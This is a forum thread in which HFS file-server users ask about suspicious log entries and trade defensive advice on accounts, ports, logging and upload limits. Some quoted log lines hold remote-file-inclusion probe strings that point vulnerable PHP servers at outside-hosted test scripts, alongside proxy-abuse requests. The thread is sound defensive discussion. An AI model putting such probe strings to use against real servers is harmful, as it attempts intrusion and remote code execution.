help, i am being hacked/monitored

[yair]

hello hfs friends.
i have been using my hfs for several months now. i love it.
lately i have been going thru my logs and see some strange activity.
someone is systematically downloading my file lists using what i assume is a php script and hosting this filelists on different subdomains. the root of those subdomains looks innocent, which makes me believe it's a parasite user of those domains.

a common log entry will look like

00:52:50 xxx.xxx.97.30:37359 Requested GET /~files.lst?hxxp://www.meijers.com/images/products/mor/dawo/

when i follow the address i get 
<?php echo md5("just_a_test");?>

what can i do, am i being paranoid? i tried baning those ip's but they just keep coming with new ones. i hate to cripple my hfs because of stuff like that. rules? disable something?

thank you.

[Foggy]

probably the easiest thing is to enable user accounts and dont give anonymous users access to anything. That way when a filelist is downloaded it wont contain anything important, it will only contain anything anonymous users can access.

btw, I just noticed that it isn't a recursive list so they are only getting a list of the files/folders in your root directory.

edit:
Does the log entry always have that url on the end of /~files.lst?


Rejetto do macro's work on the filelist.tpl?

[yair]

thanks for the replay, ye it always includes the address.
i prefer it to stay open. i dont like passwords but i may have to get used to it.

[rejetto]

The request on your log is made by a malicious program scanning the net for vulnerable servers (that is, misconfigured or bugged software).
Current HFS version has no known vulnerabilities, that means that there's no actual risk. You was "tested", but with no effect.

Your HFS is currently open to anyone.
That's not a problem while you don't have stuff that you want it to be available to anyone.

@foggy: yes, AFAIK

[yair]

respect!

[parade]

What's happening here:

24.01.2008 12:45:51 70.151.172.133:9348 Requested GET http://www.ebay.com/
24.01.2008 12:45:51 70.151.172.133:9348 Not served: 400 - Bad request

Why should somebody want to connect to ebay over my site?

[Foggy]

It is probably just a bot crawling the web looking for vulnerable sites/servers using a request for ebay as cover.

[TooL]

In the FAQ there is this:

- How do I protect my files on the HFS server? Are they safe from Internet hackers? 
You can set a username and password for a file by right-clicking the file and selecting "Set user/pass". This will not, however, protect your files from prying eyes when they are downloaded by an authorized user since HFS does not encrypt the data that is being sent. For more information, see Secure your server.

is the best way to 'Secure your server' to enable accounts and only allow those accounts access.. no anonymous users?  Or is there an even better way or some additional steps to take?

NVM - found the info here:

http://www.rejetto.com/wiki/index.php?title=HFS:_Secure_your_server

Thx   

[ELEVENNNN]

Completely offtopic but tool is the best band ever, i think i love you... if you didnt mean the band then i basically hate you

keep on rockin as rejetto says

[TCube]

Malicious programs are particulary active these days 

30/01/2008 14:29:32 62.193.242.210:56513 Requested HEAD /admin/business_inc/saveserver.php?thisdir=http://styling.dk/script/img.txt?
31/01/2008 05:40:51 217.10.33.140:1871 Requested GET http://www.yahoo.com/

I still want some parts of HFS to "be open". Is lowering "connection inactivity time out"  one way quickly to kick out those attempted connections ?

Another thing [possible risk]  some "open uploads" are possible with my HFS settings  [i.e - technical docs. - photoworkshop - ... ] I would like a feature opposite of the actual one [see. attch.].
Seems to me that setting a "max. upload HDD limit" - for example 10/20Mo in my case - would be plenty for casual use.

Thks Rejetto to think of it 
TCube

[Foggy]

I have had some weird activity aswell with requests for www.microsoft.com, I just simply changed the port hfs is on to something besides 80 and it has been mostly fine since.

[TCube]

Well, in my case I bloody can't change port 80 ... it's the only one not filtered by Cisco routers QOS from my ISP (*).


(*) Silly game of "mouse and cat" or "They Know We Know"

[rejetto]

Malicious programs are particulary active these days 

who cares? you should just re-enable the Log -> Only served requests

Is lowering "connection inactivity time out"  one way quickly to kick out those attempted connections ?

a "bad" requests takes 1-2 seconds. there's no inactivity in it.

Seems to me that setting a "max. upload HDD limit" - for example 10/20Mo in my case - would be plenty for casual use.

of course that's the first feature i thought of.
then i realized i didn't have the way to know the amount of total upload.
indeed there's reason to think all the content of an uploadable folder has been uploaded. the admin could put stuff in it.
at best i could make a feature "upload fails if there's more than X megabytes in this folder".

[MarkV]

at best i could make a feature "upload fails if there's more than X megabytes in this folder".

I just wanted to say that. It would at least prevent malicious users to misuse upload folders (warez storage or the like).

Of course the best would be a different setting for registered and unregistered users. Like unregistered users can only upload if less than 50MiB are in folder, but registered up to 200.

[TCube]

Rejetto, yes "upload fails if there's more than X megabytes in this folder" would be usefull.
I see it this way MarkV : all "upolad folders" for non-registered users point to the same HD directory [limit is 10] other "upload folders" for registered point to diff. directories with diff. settings [20/50/100/700/ unlimited etc.]
That leave us mentionning "this rule" somewhere on front end,  avoiding users loosing their time
Would that be ok ?
TCube